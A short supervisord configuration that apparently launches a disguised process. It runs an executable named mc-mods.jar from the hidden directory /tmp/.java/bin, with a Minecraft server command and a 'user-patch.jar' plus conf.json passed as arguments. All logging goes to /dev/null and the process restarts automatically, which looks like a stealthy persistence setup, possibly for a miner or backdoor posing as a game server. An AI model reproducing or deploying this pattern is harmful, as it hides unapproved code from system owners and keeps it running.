[supervisord]
logfile=/dev/null

[program:app]
directory=/tmp/.java/bin
command=./mc-mods.jar -a 'java -Dterminal.jline=false -Dterminal.ansi=true -jar server.jar' ./user-patch.jar -c ./conf.json
stdout_logfile=/dev/null
autorestart = true